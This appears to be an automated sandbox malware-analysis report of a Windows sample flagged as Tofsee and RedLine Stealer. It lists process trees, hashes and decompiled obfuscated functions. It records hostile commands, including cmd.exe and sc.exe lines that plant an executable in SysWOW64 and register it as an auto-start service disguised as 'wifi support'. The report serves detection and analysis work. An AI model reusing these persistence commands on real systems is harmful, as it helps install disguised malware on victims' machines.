Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\2B8.exe
Imagebase:	0x400000
File size:	316416 bytes
MD5 hash:	4738BD2D6F3E4DA081AF0A2218E21C37
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000003.426261967.00000000047E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000002.462876681.00000000047C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000002.461892339.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 4336 Parent PID: 5504

General

Start time:	18:48:05
Start date:	09/01/2022
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff66c1c0000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5736 Parent PID: 4336

General

Start time:	18:48:06
Start date:	09/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: 1F0B.exe PID: 6016 Parent PID: 3352

General

Start time:	18:48:13
Start date:	09/01/2022
Path:	C:\Users\user\AppData\Local\Temp\1F0B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1F0B.exe
Imagebase:	0xde0000
File size:	537600 bytes
MD5 hash:	9C40DF5E45E0C3095F7B920664A902D3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.473714109.00000000041E1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.473902157.0000000004351000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 3892 Parent PID: 5780

General

Start time:	18:48:14
Start date:	09/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\rhrovez\
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6052 Parent PID: 3892

General

Start time:	18:48:15
Start date:	09/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6128 Parent PID: 5780

General

Start time:	18:48:17
Start date:	09/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\rljdetbq.exe" C:\Windows\SysWOW64\rhrovez\
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 956 Parent PID: 6128

General

Start time:	18:48:17
Start date:	09/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: sc.exe PID: 3404 Parent PID: 5780

General

Start time:	18:48:19
Start date:	09/01/2022
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\sc.exe" create rhrovez binPath= "C:\Windows\SysWOW64\rhrovez\rljdetbq.exe /d\"C:\Users\user\AppData\Local\Temp\2B8.exe\"" type= own start= auto DisplayName= "wifi support
Imagebase:	0x800000
File size:	60928 bytes
MD5 hash:	24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 3752 Parent PID: 3404

General

Start time:	18:48:19
Start date:	09/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: 1F0B.exe PID: 2016 Parent PID: 6016

General

Start time:	18:48:20
Start date:	09/01/2022
Path:	C:\Users\user\AppData\Local\Temp\1F0B.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\1F0B.exe
Imagebase:	0x1e0000
File size:	537600 bytes
MD5 hash:	9C40DF5E45E0C3095F7B920664A902D3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: sc.exe PID: 5148 Parent PID: 5780

General

Start time:	18:48:21
Start date:	09/01/2022
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\sc.exe" description rhrovez "wifi internet conection
Imagebase:	0x800000
File size:	60928 bytes
MD5 hash:	24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5528 Parent PID: 5148

General

Start time:	18:48:22
Start date:	09/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: cz2ZyeL2Zd.exe PID: 6920 Parent PID: 5272 cz2ZyeL2Zd.exeCOMMON

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	64.7%
Signature Coverage:	23.5%
Total number of Nodes:	17
Total number of Limit Nodes:	0

Executed Functions

Function 02CA07A6, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Module32First.KERNEL32(00000000,00000224), ref: 02CA07EE

Memory Dump Source

Source File: 00000000.00000002.279052261.0000000002CA0000.00000040.00000001.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ca0000_cz2ZyeL2Zd.jbxd

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 6f19d012fccaceefa855ff65de728db30d3392d9b85e2effacafea8afab2a7e0
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 68F062315017126BD7203AB5989CB6F76E8AF896A9F100528E642D10C0DB70E9458A61

Uniqueness

Uniqueness Score: -1.00%

Function 02CA0465, Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02CA04B6

Memory Dump Source

Source File: 00000000.00000002.279052261.0000000002CA0000.00000040.00000001.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ca0000_cz2ZyeL2Zd.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 417b3a0a7f1b63acc60fc0cc49a4f4f611ebe30a34d572963c5533e87cf16bb1
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 73113C79A40208EFDB01DF98C985E98BBF5AF08751F058094F9489B361D371EA50EF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02CA0083, Relevance: .1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.279052261.0000000002CA0000.00000040.00000001.sdmp, Offset: 02CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ca0000_cz2ZyeL2Zd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 72e6db53da4fd8bca8cc0bda273959f6b356bd5f0bb0cc50a6976f7a57f3c539
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 1E11A172340101AFD754DF55DCD1FA673EAEB89364B198065ED08CB316D676E841CBA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cz2ZyeL2Zd.exe PID: 7052 Parent PID: 6920 cz2ZyeL2Zd.exeCOMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	70.8%
Total number of Nodes:	24
Total number of Limit Nodes:	0

Executed Functions

Function 0040196D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E0040196D(void* __eax, void* __ebx, void* __ecx, void* __edi, short __esi, void* __fp0) {
				intOrPtr _t14;
				void* _t17;
				intOrPtr* _t23;
				void* _t26;
				void* _t27;
				void* _t28;
				signed int _t33;
				intOrPtr* _t35;
				void* _t38;

				_t31 = __esi;
				_t29 = __edi;
				asm("in eax, 0xe5");
				 *((short*)(__eax + _t33 * 2)) = __esi;
				 *((intOrPtr*)(__eax + _t33 * 2)) = __esi;
				_push(0x1999);
				_t14 =  *_t35;
				__eflags = __al;
				_t26 = 0x5c;
				E004012AB(_t14, __ebx, _t26, _t28, __edi, __esi, _t38);
				_t23 =  *((intOrPtr*)(_t33 + 8));
				Sleep(0x1388);
				_t17 = E004014EA(_t28, _t38, __fp0, _t23,  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)), _t33 - 4); // executed
				_t39 = _t17;
				if(_t17 != 0) {
					_push( *((intOrPtr*)(_t33 + 0x14)));
					_push( *((intOrPtr*)(_t33 - 4)));
					_push(_t17);
					_push(_t23); // executed
					E004015BD(_t23, _t28, _t29, _t31, _t39); // executed
				}
				 *_t23(0xffffffff, 0); // executed
				_t27 = 0x5c;
				return E004012AB(0x1999, _t23, _t27, _t28, _t29, _t31, _t39);
			}

0x0040196d
0x0040196d
0x0040196d
0x00401970
0x00401971
0x00401973
0x00401978
0x00401986
0x0040198c
0x00401994
0x00401999
0x004019a1
0x004019af
0x004019b4
0x004019b6
0x004019b8
0x004019bb
0x004019be
0x004019bf
0x004019c0
0x004019c0
0x004019c9
0x004019e8
0x004019f9

APIs

Sleep.KERNELBASE(00001388), ref: 004019A1
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Strings

j\Y, xrefs: 00401989

Memory Dump Source

Source File: 00000003.00000002.328494203.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cz2ZyeL2Zd.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID: j\Y
API String ID: 417527130-662177190
Opcode ID: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
Instruction ID: 595b9c3ea7707adfb89ee20c44a57f79679102a22a402f6ef59d3c67027402ce
Opcode Fuzzy Hash: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
Instruction Fuzzy Hash: B10184B2604245EBDB005FE5DC92DAA3B74AF01314F2401ABF512B91F2DA3C8513E71A

Uniqueness

Uniqueness Score: -1.00%

Function 00401962, Relevance: 3.1, APIs: 2, Instructions: 52
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00401962(void* __ecx, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t9;
				void* _t12;
				void* _t17;
				intOrPtr* _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;

				_push(0x1999);
				_t9 =  *_t25;
				__eflags = __al;
				_t20 = 0x5c;
				E004012AB(_t9, _t17, _t20, _t22, _t23, _t24, _t27);
				_t18 = _a4;
				Sleep(0x1388);
				_t12 = E004014EA(_t22, _t27, __fp0, _t18, _a8, _a12,  &_v8); // executed
				_t28 = _t12;
				if(_t12 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t12);
					_push(_t18); // executed
					E004015BD(_t18, _t22, _t23, _t24, _t28); // executed
				}
				 *_t18(0xffffffff, 0); // executed
				_t21 = 0x5c;
				return E004012AB(0x1999, _t18, _t21, _t22, _t23, _t24, _t28);
			}

0x00401973
0x00401978
0x00401986
0x0040198c
0x00401994
0x00401999
0x004019a1
0x004019af
0x004019b4
0x004019b6
0x004019b8
0x004019bb
0x004019be
0x004019bf
0x004019c0
0x004019c0
0x004019c9
0x004019e8
0x004019f9

APIs

Sleep.KERNELBASE(00001388), ref: 004019A1
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Memory Dump Source

Source File: 00000003.00000002.328494203.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cz2ZyeL2Zd.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
Instruction ID: c7dbb5b86db80192b1cd6b67b95130a9e8bba6362884e51d04f8a5ef40e6dacf
Opcode Fuzzy Hash: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
Instruction Fuzzy Hash: A50144F1208205FBEB005AD59DA2E7B3668AB01715F20013BBA03790F1D57D9913E72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401A0B, Relevance: 1.6, APIs: 1, Instructions: 96
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Memory Dump Source

Source File: 00000003.00000002.328494203.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cz2ZyeL2Zd.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
Instruction ID: 6d9108f025a0daaf84588f91761baf46a4613dd7645499535b00fdf5ce75212c
Opcode Fuzzy Hash: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
Instruction Fuzzy Hash: 3E21D074609204EAC7156665C863FB637909B41329F60153FE9A3BE2F2C67C4487EB27

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040250A, Relevance: 1.3, Strings: 1, Instructions: 79
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(3_\, xrefs: 00402527

Memory Dump Source

Source File: 00000003.00000002.328494203.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cz2ZyeL2Zd.jbxd

Similarity

API ID:
String ID: (3_\
API String ID: 0-1024548672
Opcode ID: 4a267a5a5f6b649a77e844de47957a3dbb9b510094ac05e3fc21bbb07d5a18e4
Instruction ID: 64c156a0781b3c67ba192cd992c8aad639144a23081a5c252ffbc859459b19b0
Opcode Fuzzy Hash: 4a267a5a5f6b649a77e844de47957a3dbb9b510094ac05e3fc21bbb07d5a18e4
Instruction Fuzzy Hash: 60113B7911520D6FE33C8A6995A00C2B796FF85608BA1284DD3818FE03C932B493CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00402A5F, Relevance: .2, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.328494203.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cz2ZyeL2Zd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adde1d8ed614f1b4627ac8248198af32a96e582f141dfd9e05361ae7fa8ad012
Instruction ID: 5be507c2b17a54e2dc63a842639e1fc389e25062d97b9bda01936e9eba1e708e
Opcode Fuzzy Hash: adde1d8ed614f1b4627ac8248198af32a96e582f141dfd9e05361ae7fa8ad012
Instruction Fuzzy Hash: 0031CE299444499ECB2D4BB0944A1D1BBA0DF5A304BA90DCBCB91BFCD7C974B483C793

Uniqueness

Uniqueness Score: -1.00%

Function 00402AB3, Relevance: .1, Instructions: 145
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E00402AB3(void* __eax, signed int __ebx, void* __fp0) {
				signed int _t54;
				signed char _t65;
				void* _t66;
				void* _t70;
				void* _t71;
				void* _t73;
				signed int _t76;
				void* _t80;
				signed int _t82;
				signed int _t84;
				short _t85;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t93;
				void* _t95;
				void* _t96;
				void* _t98;
				signed int _t105;
				void* _t107;
				signed int _t117;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t128;
				signed int _t129;
				signed int _t131;
				signed int _t135;
				void* _t146;
				void* _t154;

				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t120 = 0xfeccffcc;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("lodsd");
				asm("int3");
				asm("int3");
				asm("movsd");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t88 = 0x20;
				asm("repne int3");
				 *(_t126 + 0x49333330) =  *(_t126 + 0x49333330) ^ 0xb9339adb;
				asm("sbb eax, 0x67cccccd");
				_t82 = __ebx |  *0xffcca0cc - 0x00000001;
				asm("daa");
				 *0xa9cca4cc =  *0xa9cca4cc - 0xffffffffb9339ada;
				_t154 = __fp0 -  *((intOrPtr*)(_t82 + 0x78));
				asm("stosd");
				asm("cmc");
				asm("int3");
				_t110 = 0xffffffffa9cca4cc;
				asm("enter 0x4fe8, 0x8");
				asm("enter 0xc927, 0xfe");
				_t105 = 0xffffffff88220080 *  *0xa9cca4cc >> 0x20;
				_t54 = 0xb9339adb *  *0xa9cca4cc;
				_t84 = (_t82 &  *(_t105 + 0x27)) >> 0xd7;
				_push(0xa9cca4cc);
				if(_t84 == 0) {
					asm("int3");
					asm("int3");
					asm("int3");
					asm("daa");
					_pop(_t131);
					_t105 = _t54 *  *(_t84 + 0x24b53927) >> 0x20;
					_t76 = _t54 *  *(_t84 + 0x24b53927);
					asm("scasb");
					_t125 = 0xfeccffcc -  *_t84;
					_t126 = _t131 ^ _t84;
					_t144 = _t126;
					asm("sidt [edi+0x680e5429]");
					if(_t126 > 0) {
						 *_t76 =  *_t76 + _t76;
						_pop(_t80);
						_t76 = E004012AB(_t80, _t84, 0x9a, _t105, 0xffffffffa9cca4cc, _t125, _t144);
						asm("invalid");
						asm("int3");
						asm("int3");
						asm("pushfd");
						_t110 = 0xffffffffa9cca4cb ^  *0x310424BB;
					}
					_t120 = _t125 ^  *_t84;
					_t88 = 0x3104241f;
					asm("int 0xcc");
				}
				asm("int3");
				asm("int3");
				_t89 = _t88 + 1;
				_t90 = _t89 - 1;
				asm("invalid");
				asm("int3");
				asm("int3");
				asm("std");
				asm("int 0xcc");
				asm("int3");
				_t93 = _t90 + 1;
				asm("cld");
				asm("int3");
				asm("int3");
				asm("pushfd");
				asm("salc");
				asm("int 0xcc");
				asm("int3");
				_t95 = _t93 - 1 + 1;
				_pop(_t135);
				asm("cld");
				asm("int3");
				asm("int3");
				asm("pushfd");
				_t117 = ((_t110 - 0x00000001 ^  *(_t89 + 0x317d243c) ^  *(_t90 + 0x3e132430)) - 0x00000001 ^  *(_t93 + 0x31462438)) - 0x00000001 ^  *(_t95 + 0x31bf2434);
				_t124 = _t120 ^  *_t84 ^  *_t84 ^  *_t84 ^  *_t84;
				_t96 = _t95 - 1;
				asm("iretd");
				asm("int 0xcc");
				asm("int3");
				asm("daa");
				asm("fisubr word [0xbaa4bd16]");
				asm("out 0xcc, eax");
				asm("int3");
				_t118 = _t117 + 1;
				asm("enter 0x4fe8, 0x8");
				asm("enter 0xc927, 0xb2");
				 *(_t117 + 1) =  *(_t117 + 1) ^ _t135;
				asm("in al, dx");
				asm("movsb");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("daa");
				_t128 = _t124;
				asm("sbb eax, 0xe23827fb");
				_t65 = _t126 & 0x00000057;
				_t107 = (_t105 &  *(_t96 - 0x7af53ed9)) -  *_t84;
				_t129 = _t128 ^ _t84;
				_t85 =  *0x68ecd704;
				_t146 = _t96 -  *((intOrPtr*)(_t65 + _t65));
				 *((intOrPtr*)(_t65 - 0x15)) =  *((intOrPtr*)(_t65 - 0x15)) + _t85;
				_t66 = _t65 + 0xf4eb2485;
				asm("in al, dx");
				E004012AB(_t66, _t85, 0xab, _t107, _t118, _t124, _t146);
				_push( *((intOrPtr*)(_t129 - 4)));
				L004019FC(_t107, _t118, _t124, _t146); // executed
				_push(_t85 + 0x3098);
				_push( *((intOrPtr*)(_t129 - 4)));
				_t70 = E00402601(_t107, _t146); // executed
				_t147 = _t70;
				if(_t70 != 0) {
					_t71 = E00401F45(_t85, _t107, _t118, _t124, _t147,  *((intOrPtr*)(_t129 - 4)));
					_t148 = _t71;
					if(_t71 != 0) {
						L18:
						_t152 = gs;
						if(gs != 0) {
							_t73 = _t85 + 0x537c;
							_t98 = 0x2e0e;
						} else {
							_t73 = _t85 + 0x30d8;
							_t98 = 0x22a4;
						}
						E00401962(_t98, _t154,  *((intOrPtr*)(_t129 - 4)), _t73, _t98,  *((intOrPtr*)(_t85 + 0x818a))); // executed
						_t70 = E004012AB(0x2c3a, _t85, 0xab, _t107, _t118, _t124, _t152);
					} else {
						_push( *((intOrPtr*)(_t129 - 4)));
						_t70 = L00402269(_t85, _t118, _t124, _t148); // executed
						_t149 = _t70;
						if(_t70 != 0) {
							_push( *((intOrPtr*)(_t129 - 4)));
							_t70 = L00402339(_t85, _t107, _t118, _t124, _t149); // executed
							_t150 = _t70;
							if(_t70 != 0) {
								_push( *((intOrPtr*)(_t129 - 4)));
								_t70 = E00402000(_t85, _t118, _t124, _t150, _t154); // executed
								if(_t70 != 0) {
									goto L18;
								}
							}
						}
					}
				}
				return _t70;
			}

0x00402ab8
0x00402abe
0x00402ac1
0x00402ac2
0x00402ac8
0x00402ac9
0x00402ace
0x00402acf
0x00402ad0
0x00402ad1
0x00402ad2
0x00402ad3
0x00402ad4
0x00402ad5
0x00402ad6
0x00402ade
0x00402adf
0x00402ae0
0x00402ae5
0x00402ae6
0x00402aec
0x00402af2
0x00402af5
0x00402af6
0x00402af7
0x00402af8
0x00402af9
0x00402afc
0x00402aff
0x00402b06
0x00402b10
0x00402b16
0x00402b18
0x00402b19
0x00402b1b
0x00402b1e
0x00402b1f
0x00402b25
0x00402b26
0x00402b27
0x00402b2b
0x00402b2f
0x00402b2f
0x00402b34
0x00402b37
0x00402b38
0x00402b3a
0x00402b3b
0x00402b3c
0x00402b3d
0x00402b3e
0x00402b3f
0x00402b3f
0x00402b45
0x00402b46
0x00402b48
0x00402b48
0x00402b4a
0x00402b51
0x00402b53
0x00402b55
0x00402b71
0x00402b78
0x00402b7a
0x00402b7b
0x00402b7c
0x00402b7d
0x00402b7d
0x00402b83
0x00402b85
0x00402b8a
0x00402b8a
0x00402b8b
0x00402b8c
0x00402b8d
0x00402b9c
0x00402ba0
0x00402ba2
0x00402ba3
0x00402bb0
0x00402bb1
0x00402bb3
0x00402bb4
0x00402bb7
0x00402bb8
0x00402bb9
0x00402bba
0x00402bc7
0x00402bc8
0x00402bca
0x00402bcb
0x00402bcd
0x00402bce
0x00402bcf
0x00402bd0
0x00402bd1
0x00402bd2
0x00402bd8
0x00402bda
0x00402bde
0x00402bdf
0x00402be1
0x00402be2
0x00402be3
0x00402be9
0x00402beb
0x00402bec
0x00402bed
0x00402bf1
0x00402bf5
0x00402bfd
0x00402bfe
0x00402c00
0x00402c01
0x00402c02
0x00402c04
0x00402c05
0x00402c06
0x00402c0b
0x00402c0d
0x00402c0f
0x00402c11
0x00402c18
0x00402c1b
0x00402c1e
0x00402c23
0x00402c35
0x00402c3a
0x00402c3d
0x00402c48
0x00402c49
0x00402c4c
0x00402c51
0x00402c53
0x00402c5c
0x00402c61
0x00402c63
0x00402c89
0x00402c8c
0x00402c8f
0x00402c9e
0x00402ca4
0x00402c91
0x00402c91
0x00402c97
0x00402c97
0x00402cb4
0x00402ce0
0x00402c65
0x00402c65
0x00402c68
0x00402c6d
0x00402c6f
0x00402c71
0x00402c74
0x00402c79
0x00402c7b
0x00402c7d
0x00402c80
0x00402c87
0x00000000
0x00000000
0x00402c87
0x00402c7b
0x00402c6f
0x00402c63
0x00402ce6

Memory Dump Source

Source File: 00000003.00000002.328494203.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cz2ZyeL2Zd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf526be089bbf4f567823773968cea02f6975f775f586de3c71f4e573fc0c6e7
Instruction ID: ee94f92266ba9be288bfed2233454c816de7546f4ab939652c09e43866b9b785
Opcode Fuzzy Hash: cf526be089bbf4f567823773968cea02f6975f775f586de3c71f4e573fc0c6e7
Instruction Fuzzy Hash: 63317A2991085D9BCB2D4B75905C191B7A4DF5E308FB60D8ACB91BFD97CA34B843C293

Uniqueness

Uniqueness Score: -1.00%

Function 00402000, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000001.278619014.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_cz2ZyeL2Zd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79ea8fd425b2c888051b2e809439338920840858330f0444cb6eb141cff5550f
Instruction ID: abc276a2ba0a36a85ab5b5df61cf416fa3bc2d73c79843c5fd07df71a10c5fed
Opcode Fuzzy Hash: 79ea8fd425b2c888051b2e809439338920840858330f0444cb6eb141cff5550f
Instruction Fuzzy Hash: 3A012B7400430CBED2289660D589453BBA8FBC1344F601D2EC3423BCE2C979B857D697

Uniqueness

Uniqueness Score: -1.00%

Function 00402000, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.328494203.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cz2ZyeL2Zd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79ea8fd425b2c888051b2e809439338920840858330f0444cb6eb141cff5550f
Instruction ID: abc276a2ba0a36a85ab5b5df61cf416fa3bc2d73c79843c5fd07df71a10c5fed
Opcode Fuzzy Hash: 79ea8fd425b2c888051b2e809439338920840858330f0444cb6eb141cff5550f
Instruction Fuzzy Hash: 3A012B7400430CBED2289660D589453BBA8FBC1344F601D2EC3423BCE2C979B857D697

Uniqueness

Uniqueness Score: -1.00%

Function 00402491, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.328494203.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cz2ZyeL2Zd.jbxd

